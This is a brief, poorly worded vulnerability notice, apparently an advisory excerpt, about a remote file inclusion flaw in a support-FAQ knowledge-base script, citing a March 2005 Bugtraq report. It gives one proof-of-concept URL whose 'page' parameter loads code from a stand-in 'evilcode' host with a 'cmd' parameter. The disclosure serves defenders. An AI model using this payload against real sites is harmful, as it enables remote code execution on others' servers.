1-2-All KB : * KnowledgeBuilder KB : * iSalient KB : * SupportTrio KB : * visualEdit KB : * General KB : : This is a support-faq script. The questions is asked. But this a script : high the risk at bug. Malicios person to reach far away. : : Vulnerable : : : http://www.site.com/[path]/index.php?page=http://evilcode?&cmd= This was reported on Mar 12, 2005 by Francisco Alisson, and apparently not patched since then. http://archives.neohapsis.com/archives/bugtraq/2005-03/0213.html